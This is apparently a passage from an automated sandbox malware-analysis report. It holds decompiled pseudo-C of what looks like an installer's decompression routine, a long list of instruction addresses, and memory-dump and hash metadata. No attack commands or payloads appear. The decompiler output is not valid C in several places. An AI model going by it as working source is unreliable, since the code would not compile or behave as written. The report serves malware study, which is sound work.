												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                          0x00000000
                                                          0x004066b9
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066e2
                                                          0x004066ec
                                                          0x00000000
                                                          0x004066bf
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066cc
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x004067ad
                                                          0x004067ad
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00000000
                                                          0x004068f3
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x00000000
                                                          0x00406110
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x00000000
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x00000000
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00406440
                                                          0x00406444
                                                          0x0040644b
                                                          0x0040644e
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x0040645b
                                                          0x00406446
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00406481
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x00000000
                                                          0x004067a6
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x00000000
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00406909
                                                          0x0040690f
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00406921
                                                          0x00406925
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00406848
                                                          0x00000000
                                                          0x004066bd

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                                                          • Instruction ID: d4317c89d1632f45c632c26a697e2fc4357ac15b25f122c790db5755eb07ebec
                                                          • Opcode Fuzzy Hash: 6c3c742c09450cbd9cdceaab41d3d05724668c311a364285e3bc9e665de74165
                                                          • Instruction Fuzzy Hash: 83913171D00229CBDF28CF98C854BADBBB1FB44309F15816AD856BB281C7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004063CF Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004063CF() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406926))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
